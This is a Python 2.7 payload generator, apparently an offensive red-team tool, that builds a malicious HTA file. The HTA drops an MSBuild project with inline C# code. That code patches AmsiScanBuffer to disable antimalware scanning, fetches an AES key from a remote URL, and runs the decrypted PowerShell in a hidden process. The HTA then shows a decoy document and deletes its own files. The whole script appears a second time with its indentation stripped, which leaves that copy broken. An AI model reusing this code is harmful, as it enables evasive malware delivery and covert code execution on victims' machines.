rvrsh3ll/shazam.py

## shazam.py
#!/usr/bin/env python2.7
import argparse
import binascii
import sys
import base64
import hashlib
from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
import random
from random import randint
import string


def create_powershell():
    posh_code = """
<INSERT POWERSHELL SCRIPT HERE>
"""
    return posh_code

def encrypt(x,y):

    key = hashlib.md5()
    key.update(x)
    key = key.hexdigest()
    with open("key.txt", "w") as key_file:
        key_file.write(key + '\n')
        iv = '1234567812345678'

    aes = AES.new(key, AES.MODE_CBC, iv)
    encoder = PKCS7Encoder()

    pad_text = encoder.encode(y)
    cipher = aes.encrypt(pad_text)
    enc_cipher = base64.b64encode(cipher)

    return enc_cipher

def create_msbuild(x,y):

    xml = """
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe MSUpdate.xml -->

  <PropertyGroup>
    <FunctionName Condition="'$(FunctionName)' == ''"></FunctionName>
    <Cmd Condition="'$(Cmd)' == ''">None</Cmd>
    <URL Condition="'$(URL)' == ''">%s</URL>
    </PropertyGroup>
  <Target Name="Run">
   <MyClass />
  </Target>
    <UsingTask
    TaskName="MyClass"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Security.Cryptography;
using System.Linq;


public class MyClass :  Task, ITask
{


    public string funcName = "$(FunctionName)";
    public string Cmd = "$(Cmd)";
    public string URL = "$(URL)";
    public string encScript = "";
    public string encryptedScript = "";
    public string decryptedString = "";
    public string x = "";
    public string newKey = "";
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    public override bool Execute()
    {
        char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
        String funcName = string.Join("", chars);

        char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
        String libName = string.Join("", chars2);

        IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);

        UIntPtr size = (UIntPtr)5;
        uint p = 0;

        VirtualProtect(Address, size, 0x40, out p);
        Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
        Marshal.Copy(Patch, 0, Address, 6);


        if (URL != "None")
        {
            var key = string.Empty;
            using (var webClient = new System.Net.WebClient())
            {
                Console.Write(URL);
                key = webClient.DownloadString(URL);
                newKey = key.Replace( "\\r", "").Replace( "\\n", "" );
                string encryptedScript = "%s";
                string decryptedString = DecryptAES.Decrypt(encryptedScript, newKey);
                var bytes = Encoding.UTF8.GetBytes(decryptedString);
                var encScript = Convert.ToBase64String(bytes);
                byte[] data = Convert.FromBase64String(encScript);
                string x = Encoding.ASCII.GetString(data);
                RunPSCommand(x);

            }
        }
        return true;
    }


        public static string RunPSCommand(string cmd)
        {

            Runspace runspace = RunspaceFactory.CreateRunspace();
            runspace.Open();
            RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
            Pipeline pipeline = runspace.CreatePipeline();
            pipeline.Commands.AddScript(cmd);
            pipeline.Commands.Add("Out-String");
            Collection<PSObject> results = pipeline.Invoke();
            runspace.Close();
            StringBuilder stringBuilder = new StringBuilder();
            foreach (PSObject obj in results)
            {
                stringBuilder.Append(obj);
            }
            return stringBuilder.ToString().Trim();
        }

        public class DecryptAES
     {
         public static string Decrypt(string cipherText, string key)
        {
            string enc_cipher = cipherText;
            var textEncoder = new UTF8Encoding();
            var aes = new AesManaged();
            aes.Key = textEncoder.GetBytes(key);
            aes.IV = textEncoder.GetBytes("1234567812345678");
            var decryptor = aes.CreateDecryptor();
            var cipher = Convert.FromBase64String(enc_cipher);
            var text_bytes = decryptor.TransformFinalBlock(cipher, 0, cipher.Length);

            var text = textEncoder.GetString(text_bytes);

            return text;
         }
     }
}
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
""" % (x,y)

    return xml

def create_hta(x,y,z):

    length = randint(0,9)
    t = ''.join(random.choice(string.lowercase) for i in range(length))
    hta_name = y

    hta = """
<script language="VBScript">
Function Stream_BinaryToString(Binary)
  Const adTypeText = 2
  Const adTypeBinary = 1
  Dim BinaryStream 'As New Stream
  Set BinaryStream = CreateObject("ADODB.Stream")
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.Write Binary
  BinaryStream.Position = 0
  BinaryStream.Type = adTypeText
  BinaryStream.CharSet = "us-ascii"
  Stream_BinaryToString = BinaryStream.ReadText
  Set BinaryStream = Nothing
End Function
Function Base64Decode(ByVal vCode)
    Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.text = vCode
    Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
    Set oNode = Nothing
    Set oXML = Nothing
End Function
Dim data
data = "%s"
Dim content
content = Base64Decode(data)

function RandomString()

    Randomize()
    dim CharacterSetArray
    CharacterSetArray = Array(_
        Array(7, "abcdefghijklmnopqrstuvwxyz"), _
        Array(1, "0123456789") _
    )
    dim i
    dim j
    dim Count
    dim Chars
    dim Index
    dim Temp

    for i = 0 to UBound(CharacterSetArray)

        Count = CharacterSetArray(i)(0)
        Chars = CharacterSetArray(i)(1)

        for j = 1 to Count

            Index = Int(Rnd() * Len(Chars)) + 1
            Temp = Temp & Mid(Chars, Index, 1)
        next
    next
    dim TemCopy
    do until Len(Temp) = 0

        Index = Int(Rnd() * Len(Temp)) + 1
        TempCopy = TempCopy & Mid(Temp, Index, 1)
        Temp = Mid(Temp, 1, Index - 1) & Mid(Temp, Index + 1)
    loop
    RandomString = TempCopy
end function
Dim filename
filename = RandomString()
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\Windows\Tasks\\%s.xml",2,true)
objFileToWrite.WriteLine(content)
objFileToWrite.Close
Set objFileToWrite = Nothing
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth _
       = 64 Then
    errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null , objConfig, intProcessID)
Else
    errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null, objConfig, intProcessID)
End If

dim fso: set fso = CreateObject("Scripting.FileSystemObject")
dim CurrentDirectory
CurrentDirectory = fso.GetAbsolutePathName(".")
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("cmd.exe /c del %s.hta", CurrentDirectory, objConfig, intProcessID)
Dim IE
Dim MyDocument
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = 1
IE.navigate "%s"
Dim dteWait
dteWait = DateAdd("s", 1, Now())
Do Until (Now() > dteWait)
Loop
errReturn = objProcess.Create("cmd.exe /c del C:\\windows\\tasks\\%s.xml", CurrentDirectory, objConfig, intProcessID)
self.close
</script>
""" % (x,t,t,t,hta_name,z,t)

    f = open(hta_name + ".hta", "w+")
    f.write(hta + '\n')
    f.close()

def main():


    parser = argparse.ArgumentParser(description="Generate Payload")
    parser.add_argument('--key', help="AES Key or Passphrase", required=True)
    parser.add_argument('--url', help="URL to the key", required=True)
    parser.add_argument('--decoy', help="URL to decoy document", required=True)
    parser.add_argument('--hta', help="HTA file name. Extension added.", required=True)
    args = parser.parse_args()


    powershell = create_powershell()
    encrypted_powershell = encrypt(args.key,powershell)
    msbuild = create_msbuild(args.url,encrypted_powershell)
    encodedMSBuild = base64.b64encode(msbuild)
    create_hta(encodedMSBuild, args.hta, args.decoy)

if __name__ == "__main__":
    main()
	#!/usr/bin/env python2.7
	import argparse
	import binascii
	import sys
	import base64
	import hashlib
	from Crypto.Cipher import AES
	from pkcs7 import PKCS7Encoder
	import random
	from random import randint
	import string


	def create_powershell():
	posh_code = """
	<INSERT POWERSHELL SCRIPT HERE>
	"""
	return posh_code

	def encrypt(x,y):

	key = hashlib.md5()
	key.update(x)
	key = key.hexdigest()
	with open("key.txt", "w") as key_file:
	key_file.write(key + '\n')
	iv = '1234567812345678'

	aes = AES.new(key, AES.MODE_CBC, iv)
	encoder = PKCS7Encoder()

	pad_text = encoder.encode(y)
	cipher = aes.encrypt(pad_text)
	enc_cipher = base64.b64encode(cipher)

	return enc_cipher

	def create_msbuild(x,y):

	xml = """
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe MSUpdate.xml -->

	<PropertyGroup>
	<FunctionName Condition="'$(FunctionName)' == ''"></FunctionName>
	<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
	<URL Condition="'$(URL)' == ''">%s</URL>
	</PropertyGroup>
	<Target Name="Run">
	<MyClass />
	</Target>
	<UsingTask
	TaskName="MyClass"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<Reference Include="System.Management.Automation" />
	<Code Type="Class" Language="cs">
	<![CDATA[
	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Reflection;
	using System.Runtime.InteropServices;
	using System.Collections.ObjectModel;
	using System.Management.Automation;
	using System.Management.Automation.Runspaces;
	using System.Text;
	using Microsoft.Build.Framework;
	using Microsoft.Build.Utilities;
	using System.Security.Cryptography;
	using System.Linq;


	public class MyClass : Task, ITask
	{


	public string funcName = "$(FunctionName)";
	public string Cmd = "$(Cmd)";
	public string URL = "$(URL)";
	public string encScript = "";
	public string encryptedScript = "";
	public string decryptedString = "";
	public string x = "";
	public string newKey = "";
	[DllImport("kernel32")]
	public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

	[DllImport("kernel32")]
	public static extern IntPtr LoadLibrary(string name);

	[DllImport("kernel32")]
	public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

	public override bool Execute()
	{
	char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
	String funcName = string.Join("", chars);

	char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
	String libName = string.Join("", chars2);

	IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);

	UIntPtr size = (UIntPtr)5;
	uint p = 0;

	VirtualProtect(Address, size, 0x40, out p);
	Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
	Marshal.Copy(Patch, 0, Address, 6);


	if (URL != "None")
	{
	var key = string.Empty;
	using (var webClient = new System.Net.WebClient())
	{
	Console.Write(URL);
	key = webClient.DownloadString(URL);
	newKey = key.Replace( "\\r", "").Replace( "\\n", "" );
	string encryptedScript = "%s";
	string decryptedString = DecryptAES.Decrypt(encryptedScript, newKey);
	var bytes = Encoding.UTF8.GetBytes(decryptedString);
	var encScript = Convert.ToBase64String(bytes);
	byte[] data = Convert.FromBase64String(encScript);
	string x = Encoding.ASCII.GetString(data);
	RunPSCommand(x);

	}
	}
	return true;
	}


	public static string RunPSCommand(string cmd)
	{

	Runspace runspace = RunspaceFactory.CreateRunspace();
	runspace.Open();
	RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
	Pipeline pipeline = runspace.CreatePipeline();
	pipeline.Commands.AddScript(cmd);
	pipeline.Commands.Add("Out-String");
	Collection<PSObject> results = pipeline.Invoke();
	runspace.Close();
	StringBuilder stringBuilder = new StringBuilder();
	foreach (PSObject obj in results)
	{
	stringBuilder.Append(obj);
	}
	return stringBuilder.ToString().Trim();
	}

	public class DecryptAES
	{
	public static string Decrypt(string cipherText, string key)
	{
	string enc_cipher = cipherText;
	var textEncoder = new UTF8Encoding();
	var aes = new AesManaged();
	aes.Key = textEncoder.GetBytes(key);
	aes.IV = textEncoder.GetBytes("1234567812345678");
	var decryptor = aes.CreateDecryptor();
	var cipher = Convert.FromBase64String(enc_cipher);
	var text_bytes = decryptor.TransformFinalBlock(cipher, 0, cipher.Length);

	var text = textEncoder.GetString(text_bytes);

	return text;
	}
	}
	}
	]]>
	</Code>
	</Task>
	</UsingTask>
	</Project>
	""" % (x,y)

	return xml

	def create_hta(x,y,z):

	length = randint(0,9)
	t = ''.join(random.choice(string.lowercase) for i in range(length))
	hta_name = y

	hta = """
	<script language="VBScript">
	Function Stream_BinaryToString(Binary)
	Const adTypeText = 2
	Const adTypeBinary = 1
	Dim BinaryStream 'As New Stream
	Set BinaryStream = CreateObject("ADODB.Stream")
	BinaryStream.Type = adTypeBinary
	BinaryStream.Open
	BinaryStream.Write Binary
	BinaryStream.Position = 0
	BinaryStream.Type = adTypeText
	BinaryStream.CharSet = "us-ascii"
	Stream_BinaryToString = BinaryStream.ReadText
	Set BinaryStream = Nothing
	End Function
	Function Base64Decode(ByVal vCode)
	Dim oXML, oNode
	Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
	Set oNode = oXML.CreateElement("base64")
	oNode.dataType = "bin.base64"
	oNode.text = vCode
	Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
	Set oNode = Nothing
	Set oXML = Nothing
	End Function
	Dim data
	data = "%s"
	Dim content
	content = Base64Decode(data)

	function RandomString()

	Randomize()
	dim CharacterSetArray
	CharacterSetArray = Array(_
	Array(7, "abcdefghijklmnopqrstuvwxyz"), _
	Array(1, "0123456789") _
	)
	dim i
	dim j
	dim Count
	dim Chars
	dim Index
	dim Temp

	for i = 0 to UBound(CharacterSetArray)

	Count = CharacterSetArray(i)(0)
	Chars = CharacterSetArray(i)(1)

	for j = 1 to Count

	Index = Int(Rnd() * Len(Chars)) + 1
	Temp = Temp & Mid(Chars, Index, 1)
	next
	next
	dim TemCopy
	do until Len(Temp) = 0

	Index = Int(Rnd() * Len(Temp)) + 1
	TempCopy = TempCopy & Mid(Temp, Index, 1)
	Temp = Mid(Temp, 1, Index - 1) & Mid(Temp, Index + 1)
	loop
	RandomString = TempCopy
	end function
	Dim filename
	filename = RandomString()
	Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\Windows\Tasks\\%s.xml",2,true)
	objFileToWrite.WriteLine(content)
	objFileToWrite.Close
	Set objFileToWrite = Nothing
	Const HIDDEN_WINDOW = 12
	strComputer = "."
	Set objWMIService = GetObject("winmgmts:" _
	& "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2")
	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = HIDDEN_WINDOW
	Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
	If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth _
	= 64 Then
	errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null , objConfig, intProcessID)
	Else
	errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null, objConfig, intProcessID)
	End If

	dim fso: set fso = CreateObject("Scripting.FileSystemObject")
	dim CurrentDirectory
	CurrentDirectory = fso.GetAbsolutePathName(".")
	strComputer = "."
	Set objWMIService = GetObject("winmgmts:" _
	& "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2")
	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = HIDDEN_WINDOW
	Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
	errReturn = objProcess.Create("cmd.exe /c del %s.hta", CurrentDirectory, objConfig, intProcessID)
	Dim IE
	Dim MyDocument
	Set IE = CreateObject("InternetExplorer.Application")
	IE.Visible = 1
	IE.navigate "%s"
	Dim dteWait
	dteWait = DateAdd("s", 1, Now())
	Do Until (Now() > dteWait)
	Loop
	errReturn = objProcess.Create("cmd.exe /c del C:\\windows\\tasks\\%s.xml", CurrentDirectory, objConfig, intProcessID)
	self.close
	</script>
	""" % (x,t,t,t,hta_name,z,t)

	f = open(hta_name + ".hta", "w+")
	f.write(hta + '\n')
	f.close()

	def main():


	parser = argparse.ArgumentParser(description="Generate Payload")
	parser.add_argument('--key', help="AES Key or Passphrase", required=True)
	parser.add_argument('--url', help="URL to the key", required=True)
	parser.add_argument('--decoy', help="URL to decoy document", required=True)
	parser.add_argument('--hta', help="HTA file name. Extension added.", required=True)
	args = parser.parse_args()


	powershell = create_powershell()
	encrypted_powershell = encrypt(args.key,powershell)
	msbuild = create_msbuild(args.url,encrypted_powershell)
	encodedMSBuild = base64.b64encode(msbuild)
	create_hta(encodedMSBuild, args.hta, args.decoy)

	if __name__ == "__main__":
	main()